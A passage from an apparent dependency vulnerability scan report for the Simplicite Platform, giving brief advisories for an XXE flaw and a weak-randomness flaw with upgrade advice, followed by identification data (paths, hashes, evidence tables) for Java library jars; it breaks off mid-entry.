A vulnerability was found in java-xmlbuilder up to 1.1. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to xml external entity reference. Upgrading to version 1.2 is able to address this issue. The name of the patch is e6fddca201790abab4f2c274341c0bb8835c3e73. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-221480. CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions:
CVE-2021-4277
A vulnerability, which was classified as problematic, has been found in fredsmith utils. This issue affects some unknown processing of the file screenshot_sync of the component Filename Handler. The manipulation leads to predictable from observable state. The name of the patch is dbab1b66955eeb3d76b34612b358307f5c4e3944. It is recommended to apply a patch to fix this issue. The identifier VDB-216749 was assigned to this vulnerability. CWE-330 Use of Insufficiently Random Values
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N References:
Vulnerable Software & Versions:
javase-3.0.1.jarDescription:
Java SE-specific extensions to core ZXing library File Path: /var/simplicite/.m2/repository/com/google/zxing/javase/3.0.1/javase-3.0.1.jar
MD5: 04258960339322ce4fb90718899ff4c9
SHA1: 06fa0ae253f5bb2943fb64100c936d6a142832c2
SHA256: 83c1e61db240c81b9b9628ea8dd63944cacf2b4f3578b4f3f4d3104506e4d0a4
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name javase High Vendor jar package name client Low Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name zxing Highest Vendor jar package name zxing Low Vendor pom artifactid javase Highest Vendor pom artifactid javase Low Vendor pom groupid com.google.zxing Highest Vendor pom name ZXing Java SE extensions High Vendor pom parent-artifactid zxing-parent Low Product file name javase High Product jar package name client Low Product jar package name google Highest Product jar package name j2se Low Product jar package name zxing Highest Product jar package name zxing Low Product pom artifactid javase Highest Product pom groupid com.google.zxing Highest Product pom name ZXing Java SE extensions High Product pom parent-artifactid zxing-parent Medium Version file version 3.0.1 High Version pom version 3.0.1 Highest
javax.activation-api-1.2.0.jarDescription:
JavaBeans Activation Framework API jar License:
https://github.com/javaee/activation/blob/master/LICENSE.txt File Path: /var/simplicite/.m2/repository/javax/activation/javax.activation-api/1.2.0/javax.activation-api-1.2.0.jar
MD5: 5e50e56bcf4a3ef3bc758f69f7643c3b
SHA1: 85262acf3ca9816f9537ca47d5adeabaead7cb16
SHA256: 43fdef0b5b6ceb31b0424b208b930c74ab58fac2ceeb7b3f6fd3aeb8b5ca4393
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name javax.activation-api High Vendor jar package name activation Highest Vendor jar package name javax Highest Vendor Manifest automatic-module-name java.activation Medium Vendor Manifest bundle-docurl http://www.oracle.com Low Vendor Manifest bundle-symbolicname javax.activation-api Medium Vendor Manifest extension-name javax.activation Medium Vendor Manifest Implementation-Vendor Oracle High Vendor Manifest Implementation-Vendor-Id com.sun Medium Vendor Manifest originally-created-by 1.8.0_141 (Oracle Corporation) Low Vendor Manifest specification-vendor Oracle Low Vendor Manifest (hint) Implementation-Vendor sun High Vendor Manifest (hint) specification-vendor sun Low Vendor pom artifactid javax.activation-api Highest Vendor pom artifactid javax.activation-api Low Vendor pom groupid javax.activation Highest Vendor pom name JavaBeans Activation Framework API jar High Vendor pom parent-artifactid all Low Vendor pom parent-groupid com.sun.activation Medium Product file name javax.activation-api High Product jar package name activation Highest Product jar package name javax Highest Product Manifest automatic-module-name java.activation Medium Product Manifest bundle-docurl http://www.oracle.com Low Product Manifest Bundle-Name JavaBeans Activation Framework API jar Medium Product Manifest bundle-symbolicname javax.activation-api Medium Product Manifest extension-name javax.activation Medium Product Manifest Implementation-Title javax.activation.javax.activation-api High Product Manifest originally-created-by 1.8.0_141 (Oracle Corporation) Low Product Manifest specification-title javax.activation.javax.activation-api Medium Product pom artifactid javax.activation-api Highest Product pom groupid javax.activation Highest Product pom name JavaBeans Activation Framework API jar High Product pom parent-artifactid all Medium Product pom parent-groupid com.sun.activation Medium Version file version 1.2.0 High Version Manifest Bundle-Version 1.2.0 High Version Manifest Implementation-Version 1.2.0 High Version pom version 1.2.0 Highest
javax.annotation-api-1.3.2.jarDescription:
Common Annotations for the JavaTM Platform API License:
CDDL + GPLv2 with classpath exception: https://github.com/javaee/javax.annotation/blob/master/LICENSE File Path: /var/simplicite/.m2/repository/javax/annotation/javax.annotation-api/1.3.2/javax.annotation-api-1.3.2.jar
MD5: 2ab1973eefffaa2aeec47d50b9e40b9d
SHA1: 934c04d3cfef185a8008e7bf34331b79730a9d43
SHA256: e04ba5195bcd555dc95650f7cc614d151e4bcd52d29a10b8aa2197f3ab89ab9b
Referenced In Project/Scope: Simplicite Platform:provided
Evidence Type Source Name Value Confidence Vendor file name javax.annotation-api High Vendor jar package name annotation Highest Vendor jar package name javax Highest Vendor Manifest automatic-module-name java.annotation Medium Vendor Manifest bundle-docurl https://javaee.github.io/glassfish Low Vendor Manifest bundle-symbolicname javax.annotation-api Medium Vendor Manifest extension-name javax.annotation Medium Vendor Manifest Implementation-Vendor GlassFish Community High Vendor Manifest Implementation-Vendor-Id org.glassfish Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.annotation-api Highest Vendor pom artifactid javax.annotation-api Low Vendor pom developer id ldemichiel Medium Vendor pom developer name Linda De Michiel Medium Vendor pom developer org Oracle Corp. Medium Vendor pom groupid javax.annotation Highest Vendor pom name ${extension.name} API High Vendor pom organization name GlassFish Community High Vendor pom organization url https://javaee.github.io/glassfish Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url http://jcp.org/en/jsr/detail?id=250 Highest Product file name javax.annotation-api High Product jar package name annotation Highest Product jar package name javax Highest Product Manifest automatic-module-name java.annotation Medium Product Manifest bundle-docurl https://javaee.github.io/glassfish Low Product Manifest Bundle-Name javax.annotation API Medium Product Manifest bundle-symbolicname javax.annotation-api Medium Product Manifest extension-name javax.annotation Medium Product pom artifactid javax.annotation-api Highest Product pom developer id ldemichiel Low Product pom developer name Linda De Michiel Low Product pom developer org Oracle Corp. Low Product pom groupid javax.annotation Highest Product pom name ${extension.name} API High Product pom organization name GlassFish Community Low Product pom organization url https://javaee.github.io/glassfish Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url http://jcp.org/en/jsr/detail?id=250 Medium Version file version 1.3.2 High Version Manifest Bundle-Version 1.3.2 High Version Manifest Implementation-Version 1.3.2 High Version pom parent-version 1.3.2 Low Version pom version 1.3.2 Highest
javax.ejb-api-3.2.2.jarDescription:
Project GlassFish Enterprise JavaBean API License:
CDDL + GPLv2 with classpath exception: https://oss.oracle.com/licenses/CDDL+GPL-1.1 File Path: /var/simplicite/.m2/repository/javax/ejb/javax.ejb-api/3.2.2/javax.ejb-api-3.2.2.jar
MD5: f7a1ffa8ec359720a01dd09f79f042c3
SHA1: 8921a3e3cb30fe5966531ad53902eef19303123b
SHA256: 13ff874c58c32b649077dab6ab23bc93938610adc99e90d63933f6f074805b72
Referenced In Project/Scope: Simplicite Platform:provided
Evidence Type Source Name Value Confidence Vendor file name javax.ejb-api High Vendor jar package name ejb Highest Vendor jar package name javax Highest Vendor Manifest bundle-docurl http://www.oracle.com Low Vendor Manifest bundle-symbolicname javax.ejb-api Medium Vendor Manifest extension-name javax.ejb Medium Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest Implementation-Vendor-Id org.glassfish Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.ejb-api Highest Vendor pom artifactid javax.ejb-api Low Vendor pom developer id mvatkina Medium Vendor pom developer name Marina Vatkina Medium Vendor pom developer org Oracle, Inc. Medium Vendor pom groupid javax.ejb Highest Vendor pom name ${extension.name} API High Vendor pom organization name Oracle Corporation High Vendor pom organization url http://www.oracle.com Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url javaee/javax.ejb Highest Product file name javax.ejb-api High Product jar package name ejb Highest Product jar package name javax Highest Product Manifest bundle-docurl http://www.oracle.com Low Product Manifest Bundle-Name javax.ejb API Medium Product Manifest bundle-symbolicname javax.ejb-api Medium Product Manifest extension-name javax.ejb Medium Product pom artifactid javax.ejb-api Highest Product pom developer id mvatkina Low Product pom developer name Marina Vatkina Low Product pom developer org Oracle, Inc. Low Product pom groupid javax.ejb Highest Product pom name ${extension.name} API High Product pom organization name Oracle Corporation Low Product pom organization url http://www.oracle.com Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url javaee/javax.ejb High Version file version 3.2.2 High Version Manifest Bundle-Version 3.2.2 High Version Manifest Implementation-Version 3.2.2 High Version pom parent-version 3.2.2 Low Version pom version 3.2.2 Highest
javax.inject-1.jarDescription:
The javax.inject API License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/javax/inject/javax.inject/1/javax.inject-1.jar
MD5: 289075e48b909e9e74e6c915b3631d2e
SHA1: 6975da39a7040257bd51d21a231b76c915872d38
SHA256: 91c77044a50c481636c32d916fd89c9118a72195390452c81065080f957de7ff
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name javax.inject-1 High Vendor jar package name inject Highest Vendor jar package name inject Low Vendor jar package name javax Highest Vendor jar package name javax Low Vendor pom artifactid javax.inject Highest Vendor pom artifactid javax.inject Low Vendor pom groupid javax.inject Highest Vendor pom name javax.inject High Vendor pom url http://code.google.com/p/atinject/ Highest Product file name javax.inject-1 High Product jar package name inject Highest Product jar package name inject Low Product jar package name javax Highest Product pom artifactid javax.inject Highest Product pom groupid javax.inject Highest Product pom name javax.inject High Product pom url http://code.google.com/p/atinject/ Medium Version file version 1 Medium Version pom version 1 Highest
javax.jms-api-2.0.1.jarDescription:
Java(TM) Message Service Specification License:
CDDL + GPLv2 with classpath exception: https://glassfish.java.net/nonav/public/CDDL+GPL_1_1.html File Path: /var/simplicite/.m2/repository/javax/jms/javax.jms-api/2.0.1/javax.jms-api-2.0.1.jar
MD5: d69d2e02910e97b2478c0105e9b2caab
SHA1: 5faaa3864ff6025ce69809b60d65bda3e358610c
SHA256: aa4a16fac46d949b17b32091036e4d1e3c812ef3b4bd184ec838efffb53ba4f8
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name javax.jms-api High Vendor jar package name javax Highest Vendor jar package name jms Highest Vendor Manifest bundle-symbolicname javax.jms-api Medium Vendor Manifest extension-name javax.jms Medium Vendor Manifest Implementation-Vendor-Id org.glassfish.mq Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.jms-api Highest Vendor pom artifactid javax.jms-api Low Vendor pom developer org Oracle Corporation Medium Vendor pom groupid javax.jms Highest Vendor pom name JMS API High Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url http://java.net/projects/jms-spec/pages/Home Highest Product file name javax.jms-api High Product jar package name javax Highest Product jar package name jms Highest Product jar package name message Highest Product Manifest Bundle-Name JMS API Medium Product Manifest bundle-symbolicname javax.jms-api Medium Product Manifest extension-name javax.jms Medium Product pom artifactid javax.jms-api Highest Product pom developer org Oracle Corporation Low Product pom groupid javax.jms Highest Product pom name JMS API High Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url http://java.net/projects/jms-spec/pages/Home Medium Version file version 2.0.1 High Version Manifest Bundle-Version 2.0.1 High Version Manifest Implementation-Version 2.0.1 High Version pom parent-version 2.0.1 Low Version pom version 2.0.1 Highest
javax.mail-1.6.2.jarDescription:
JavaMail API License:
https://javaee.github.io/javamail/LICENSE File Path: /var/simplicite/.m2/repository/com/sun/mail/javax.mail/1.6.2/javax.mail-1.6.2.jar
MD5: 0b81d022797740d72d21620781841374
SHA1: 935151eb71beff17a2ffac15dd80184a99a0514f
SHA256: 45b515e7104944c09e45b9c7bb1ce5dff640486374852dd2b2e80cc3752dfa11
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name javax.mail High Vendor jar package name javax Highest Vendor jar package name mail Highest Vendor jar package name provider Highest Vendor jar package name sun Highest Vendor jar (hint) package name oracle Highest Vendor Manifest automatic-module-name java.mail Medium Vendor Manifest bundle-docurl http://www.oracle.com Low Vendor Manifest bundle-symbolicname com.sun.mail.javax.mail Medium Vendor Manifest extension-name javax.mail Medium Vendor Manifest Implementation-Vendor Oracle High Vendor Manifest Implementation-Vendor-Id com.sun Medium Vendor Manifest probe-provider-xml-file-names META-INF/gfprobe-provider.xml Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Oracle Low Vendor Manifest (hint) Implementation-Vendor sun High Vendor Manifest (hint) specification-vendor sun Low Vendor pom artifactid javax.mail Highest Vendor pom artifactid javax.mail Low Vendor pom groupid com.sun.mail Highest Vendor pom name JavaMail API High Vendor pom parent-artifactid all Low Product file name javax.mail High Product jar package name javax Highest Product jar package name mail Highest Product jar package name provider Highest Product jar package name sun Highest Product jar package name version Highest Product Manifest automatic-module-name java.mail Medium Product Manifest bundle-docurl http://www.oracle.com Low Product Manifest Bundle-Name JavaMail API Medium Product Manifest bundle-symbolicname com.sun.mail.javax.mail Medium Product Manifest extension-name javax.mail Medium Product Manifest Implementation-Title javax.mail High Product Manifest probe-provider-xml-file-names META-INF/gfprobe-provider.xml Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title JavaMail(TM) API Design Specification Medium Product pom artifactid javax.mail Highest Product pom groupid com.sun.mail Highest Product pom name JavaMail API High Product pom parent-artifactid all Medium Version file version 1.6.2 High Version Manifest Bundle-Version 1.6.2 High Version Manifest Implementation-Version 1.6.2 High Version pom version 1.6.2 Highest
javax.servlet-api-4.0.1.jarDescription:
Java(TM) Servlet 4.0 API Design Specification License:
CDDL + GPLv2 with classpath exception: https://oss.oracle.com/licenses/CDDL+GPL-1.1 File Path: /var/simplicite/.m2/repository/javax/servlet/javax.servlet-api/4.0.1/javax.servlet-api-4.0.1.jar
MD5: b80414033bf3397de334b95e892a2f44
SHA1: a27082684a2ff0bf397666c3943496c44541d1ca
SHA256: 83a03dd877d3674576f0da7b90755c8524af099ccf0607fc61aa971535ad7c60
Referenced In Project/Scope: Simplicite Platform:provided
Evidence Type Source Name Value Confidence Vendor file name javax.servlet-api High Vendor jar package name javax Highest Vendor jar package name servlet Highest Vendor Manifest bundle-docurl https://javaee.github.io Low Vendor Manifest bundle-symbolicname javax.servlet-api Medium Vendor Manifest extension-name javax.servlet Medium Vendor Manifest Implementation-Vendor GlassFish Community High Vendor Manifest Implementation-Vendor-Id org.glassfish Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.servlet-api Highest Vendor pom artifactid javax.servlet-api Low Vendor pom developer id edburns Medium Vendor pom developer id shingwaichan Medium Vendor pom developer name Ed Burns Medium Vendor pom developer name Shing Wai Chan Medium Vendor pom developer org Oracle Medium Vendor pom groupid javax.servlet Highest Vendor pom name Java Servlet API High Vendor pom organization name GlassFish Community High Vendor pom organization url https://javaee.github.io Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url https://javaee.github.io/servlet-spec/ Highest Vendor pom (hint) developer org sun Medium Product file name javax.servlet-api High Product jar package name javax Highest Product jar package name servlet Highest Product Manifest bundle-docurl https://javaee.github.io Low Product Manifest Bundle-Name Java Servlet API Medium Product Manifest bundle-symbolicname javax.servlet-api Medium Product Manifest extension-name javax.servlet Medium Product pom artifactid javax.servlet-api Highest Product pom developer id edburns Low Product pom developer id shingwaichan Low Product pom developer name Ed Burns Low Product pom developer name Shing Wai Chan Low Product pom developer org Oracle Low Product pom groupid javax.servlet Highest Product pom name Java Servlet API High Product pom organization name GlassFish Community Low Product pom organization url https://javaee.github.io Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url https://javaee.github.io/servlet-spec/ Medium Version file version 4.0.1 High Version Manifest Implementation-Version 4.0.1 High Version pom parent-version 4.0.1 Low Version pom version 4.0.1 Highest
javax.servlet.jsp-api-2.3.3.jarDescription:
Java.net - The Source for Java Technology Collaboration License:
CDDL + GPLv2 with classpath exception: https://oss.oracle.com/licenses/CDDL+GPL-1.1 File Path: /var/simplicite/.m2/repository/javax/servlet/jsp/javax.servlet.jsp-api/2.3.3/javax.servlet.jsp-api-2.3.3.jar
MD5: f6676a5961328c41c5e722da5e48d047
SHA1: 81191ab80e342912dc9cea735c30ff4eddc64de3
SHA256: 409a534d275ef0958a2c1692472da30e3706bfe6933d56c039376f53f13689b7
Referenced In Project/Scope: Simplicite Platform:provided
Evidence Type Source Name Value Confidence Vendor file name javax.servlet.jsp-api High Vendor jar package name javax Highest Vendor jar package name jsp Highest Vendor jar package name servlet Highest Vendor Manifest bundle-docurl http://www.oracle.com Low Vendor Manifest bundle-symbolicname javax.servlet.jsp-api Medium Vendor Manifest extension-name javax.servlet.jsp Medium Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.servlet.jsp-api Highest Vendor pom artifactid javax.servlet.jsp-api Low Vendor pom developer id kchung Medium Vendor pom developer name Kin-man Chung Medium Vendor pom developer org Oracle Corporation Medium Vendor pom groupid javax.servlet.jsp Highest Vendor pom name JavaServer Pages(TM) API High Vendor pom organization name Oracle High Vendor pom organization url http://www.oracle.com Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url https://javaee.github.io/javaee-jsp-api Highest Vendor pom (hint) organization name sun High Product file name javax.servlet.jsp-api High Product jar package name javax Highest Product jar package name jsp Highest Product jar package name servlet Highest Product Manifest bundle-docurl http://www.oracle.com Low Product Manifest Bundle-Name JavaServer Pages(TM) API Medium Product Manifest bundle-symbolicname javax.servlet.jsp-api Medium Product Manifest extension-name javax.servlet.jsp Medium Product pom artifactid javax.servlet.jsp-api Highest Product pom developer id kchung Low Product pom developer name Kin-man Chung Low Product pom developer org Oracle Corporation Low Product pom groupid javax.servlet.jsp Highest Product pom name JavaServer Pages(TM) API High Product pom organization name Oracle Low Product pom organization url http://www.oracle.com Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url https://javaee.github.io/javaee-jsp-api Medium Version file version 2.3.3 High Version Manifest Bundle-Version 2.3.3 High Version Manifest Implementation-Version 2.3.3 High Version pom parent-version 2.3.3 Low Version pom version 2.3.3 Highest
javax.transaction-api-1.3.jarDescription:
Project GlassFish Java Transaction API License:
CDDL + GPLv2 with classpath exception: https://github.com/javaee/javax.transaction/blob/master/LICENSE File Path: /var/simplicite/.m2/repository/javax/transaction/javax.transaction-api/1.3/javax.transaction-api-1.3.jar
MD5: 6e9cb1684621821248b6823143ae26c0
SHA1: e006adf5cf3cca2181d16bd640ecb80148ec0fce
SHA256: 603df5e4fc1eeae8f5e5d363a8be6c1fa47d0df1df8739a05cbcb9fafd6df2da
Referenced In Project/Scope: Simplicite Platform:provided
Evidence Type Source Name Value Confidence Vendor file name javax.transaction-api High Vendor jar package name javax Highest Vendor jar package name transaction Highest Vendor Manifest automatic-module-name java.transaction Medium Vendor Manifest bundle-docurl https://glassfish.java.net Low Vendor Manifest bundle-symbolicname javax.transaction-api Medium Vendor Manifest extension-name javax.transaction Medium Vendor Manifest Implementation-Vendor GlassFish Community High Vendor Manifest Implementation-Vendor-Id org.glassfish Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.transaction-api Highest Vendor pom artifactid javax.transaction-api Low Vendor pom developer id stephen_felts Medium Vendor pom developer name Stephen Felts Medium Vendor pom developer org Oracle, Inc. Medium Vendor pom groupid javax.transaction Highest Vendor pom name ${extension.name} API High Vendor pom organization name GlassFish Community High Vendor pom organization url https://glassfish.java.net Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url http://jta-spec.java.net Highest Product file name javax.transaction-api High Product jar package name javax Highest Product jar package name transaction Highest Product Manifest automatic-module-name java.transaction Medium Product Manifest bundle-docurl https://glassfish.java.net Low Product Manifest Bundle-Name javax.transaction API Medium Product Manifest bundle-symbolicname javax.transaction-api Medium Product Manifest extension-name javax.transaction Medium Product pom artifactid javax.transaction-api Highest Product pom developer id stephen_felts Low Product pom developer name Stephen Felts Low Product pom developer org Oracle, Inc. Low Product pom groupid javax.transaction Highest Product pom name ${extension.name} API High Product pom organization name GlassFish Community Low Product pom organization url https://glassfish.java.net Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url http://jta-spec.java.net Medium Version file version 1.3 High Version Manifest Bundle-Version 1.3 High Version Manifest Implementation-Version 1.3 High Version pom parent-version 1.3 Low Version pom version 1.3 Highest
javax.websocket-api-1.1.jarDescription:
JSR 356: Java API for WebSocket License:
https://glassfish.java.net/public/CDDL+GPL_1_1.html File Path: /var/simplicite/.m2/repository/javax/websocket/javax.websocket-api/1.1/javax.websocket-api-1.1.jar
MD5: be29e11a4a15742aa6fb418fa46345e3
SHA1: eeeb68631711256418dfbb47b11c731b6c8f6235
SHA256: a260973517bf6411d659b588a719aa27e7e4e47dfbd510fceb5bf1023a2c45e4
Referenced In Project/Scope: Simplicite Platform:provided
Evidence Type Source Name Value Confidence Vendor file name javax.websocket-api High Vendor jar package name javax Highest Vendor jar package name server Highest Vendor jar package name websocket Highest Vendor Manifest bundle-docurl http://www.oracle.com Low Vendor Manifest bundle-symbolicname javax.websocket-api Medium Vendor Manifest extension-name javax.websocket Medium Vendor pom artifactid javax.websocket-api Highest Vendor pom artifactid javax.websocket-api Low Vendor pom groupid javax.websocket Highest Vendor pom name WebSocket server API High Vendor pom parent-artifactid javax.websocket-all Low Vendor pom url http://websocket-spec.java.net Highest Product file name javax.websocket-api High Product jar package name javax Highest Product jar package name server Highest Product jar package name websocket Highest Product Manifest bundle-docurl http://www.oracle.com Low Product Manifest Bundle-Name WebSocket server API Medium Product Manifest bundle-symbolicname javax.websocket-api Medium Product Manifest extension-name javax.websocket Medium Product pom artifactid javax.websocket-api Highest Product pom groupid javax.websocket Highest Product pom name WebSocket server API High Product pom parent-artifactid javax.websocket-all Medium Product pom url http://websocket-spec.java.net Medium Version file version 1.1 High Version Manifest Bundle-Version 1.1 High Version Manifest Implementation-Version 1.1 High Version pom version 1.1 Highest
javax.ws.rs-api-2.0.1.jarDescription:
Java API for RESTful Web Services (JAX-RS) License:
CDDL 1.1: http://glassfish.java.net/public/CDDL+GPL_1_1.html
GPL2 w/ CPE: http://glassfish.java.net/public/CDDL+GPL_1_1.html File Path: /var/simplicite/.m2/repository/javax/ws/rs/javax.ws.rs-api/2.0.1/javax.ws.rs-api-2.0.1.jar
MD5: edcd111cf4d3ba8ac8e1f326efc37a17
SHA1: 104e9c2b5583cfcfeac0402316221648d6d8ea6b
SHA256: 38607d626f2288d8fbc1b1f8a62c369e63806d9a313ac7cbc5f9d6c94f4b466d
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name javax.ws.rs-api High Vendor hint analyzer vendor web services Medium Vendor jar package name javax Highest Vendor jar package name rs Highest Vendor jar package name ws Highest Vendor Manifest bundle-docurl http://www.oracle.com/ Low Vendor Manifest bundle-symbolicname javax.ws.rs-api Medium Vendor Manifest extension-name javax.ws.rs Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.ws.rs-api Highest Vendor pom artifactid javax.ws.rs-api Low Vendor pom developer email m_potociar@java.net Low Vendor pom developer email spericas@java.net Low Vendor pom developer id Marek Medium Vendor pom developer id Santiago Medium Vendor pom developer name Marek Potociar Medium Vendor pom developer name Santiago Pericas-Geertsen Medium Vendor pom developer org Oracle Medium Vendor pom developer org URL http://jax-rs-spec.java.net Medium Vendor pom groupid javax.ws.rs Highest Vendor pom name javax.ws.rs-api High Vendor pom organization name Oracle Corporation High Vendor pom organization url http://www.oracle.com/ Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url http://jax-rs-spec.java.net Highest Vendor pom (hint) developer org sun Medium Product file name javax.ws.rs-api High Product hint analyzer product web services Medium Product jar package name javax Highest Product jar package name rs Highest Product jar package name ws Highest Product Manifest bundle-docurl http://www.oracle.com/ Low Product Manifest Bundle-Name javax.ws.rs-api Medium Product Manifest bundle-symbolicname javax.ws.rs-api Medium Product Manifest extension-name javax.ws.rs Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid javax.ws.rs-api Highest Product pom developer email m_potociar@java.net Low Product pom developer email spericas@java.net Low Product pom developer id Marek Low Product pom developer id Santiago Low Product pom developer name Marek Potociar Low Product pom developer name Santiago Pericas-Geertsen Low Product pom developer org Oracle Low Product pom developer org URL http://jax-rs-spec.java.net Low Product pom groupid javax.ws.rs Highest Product pom name javax.ws.rs-api High Product pom organization name Oracle Corporation Low Product pom organization url http://www.oracle.com/ Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url http://jax-rs-spec.java.net Medium Version file version 2.0.1 High Version Manifest Bundle-Version 2.0.1 High Version Manifest Implementation-Version 2.0.1 High Version pom parent-version 2.0.1 Low Version pom version 2.0.1 Highest
jawk-1.02.jarDescription:
POM was created from install:install-file File Path: /var/simplicite/.m2/repository/org/jawk/jawk/1.02/jawk-1.02.jar
MD5: cd04ea3460d71a03ca5f4232c9ee5f0c
SHA1: 7bdd8bb1a1b9adff9b471cc041cba83ef3a2abe6
SHA256: 2773c7f47b2ee8f483d6cb30f799c31f81645d23f49910e58ef4cccb2ffe1c7b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jawk High Vendor jar package name jawk Highest Vendor jar package name jawk Low Vendor pom artifactid jawk Highest Vendor pom artifactid jawk Low Vendor pom groupid org.jawk Highest Product file name jawk High Product jar package name jawk Highest Product pom artifactid jawk Highest Product pom groupid org.jawk Highest Version file version 1.02 High Version pom version 1.02 Highest
jaxb-api-2.3.1.jarDescription:
JAXB (JSR 222) API License:
https://oss.oracle.com/licenses/CDDL+GPL-1.1, https://oss.oracle.com/licenses/CDDL+GPL-1.1 File Path: /var/simplicite/.m2/repository/javax/xml/bind/jaxb-api/2.3.1/jaxb-api-2.3.1.jar
MD5: bcf270d320f645ad19f5edb60091e87f
SHA1: 8531ad5ac454cc2deb9d4d32c40c4d7451939b5d
SHA256: 88b955a0df57880a26a74708bc34f74dcaf8ebf4e78843a28b50eae945732b06
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jaxb-api High Vendor jar package name bind Highest Vendor jar package name javax Highest Vendor jar package name jaxb Highest Vendor jar package name xml Highest Vendor Manifest bundle-docurl http://www.oracle.com/ Low Vendor Manifest bundle-symbolicname jaxb-api Medium Vendor Manifest extension-name javax.xml.bind Medium Vendor Manifest implementation-build-id UNKNOWN-7de2ca118a0cfc4a373872915aef59148dff5f93, 2018-09-12T06:28:43-0700 Low Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest Implementation-Vendor-Id org.glassfish Medium Vendor Manifest multi-release true Low Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version>=1.8))" Low Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid jaxb-api Highest Vendor pom artifactid jaxb-api Low Vendor pom groupid javax.xml.bind Highest Vendor pom parent-artifactid jaxb-api-parent Low Product file name jaxb-api High Product jar package name bind Highest Product jar package name javax Highest Product jar package name jaxb Highest Product jar package name xml Highest Product Manifest bundle-docurl http://www.oracle.com/ Low Product Manifest Bundle-Name jaxb-api Medium Product Manifest bundle-symbolicname jaxb-api Medium Product Manifest extension-name javax.xml.bind Medium Product Manifest implementation-build-id UNKNOWN-7de2ca118a0cfc4a373872915aef59148dff5f93, 2018-09-12T06:28:43-0700 Low Product Manifest multi-release true Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version>=1.8))" Low Product Manifest specification-title jaxb-api Medium Product pom artifactid jaxb-api Highest Product pom groupid javax.xml.bind Highest Product pom parent-artifactid jaxb-api-parent Medium Version file version 2.3.1 High Version Manifest Bundle-Version 2.3.1 High Version pom version 2.3.1 Highest

jaxb-runtime-2.3.2.jar
Description: JAXB (JSR 222) Reference Implementation
File Path: /var/simplicite/.m2/repository/org/glassfish/jaxb/jaxb-runtime/2.3.2/jaxb-runtime-2.3.2.jar
MD5: 9c3bf13a58e56c1b955bf5a365ca10b2
SHA1: 5528bc882ea499a09d720b42af11785c4fc6be2a
SHA256: e6e0a1e89fb6ff786279e6a0082d5cef52dc2ebe67053d041800737652b4fd1b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jaxb-runtime | High
Vendor | jar | package name | bind | Highest
Vendor | jar | package name | sun | Highest
Vendor | jar | package name | xml | Highest
Vendor | jar (hint) | package name | oracle | Highest
Vendor | Manifest | git-revision | ae93d95 | Low
Vendor | Manifest | Implementation-Vendor | Oracle | High
Vendor | Manifest | Implementation-Vendor-Id | com.oracle | Medium
Vendor | Manifest (hint) | Implementation-Vendor | sun | High
Vendor | pom | artifactid | jaxb-runtime | Highest
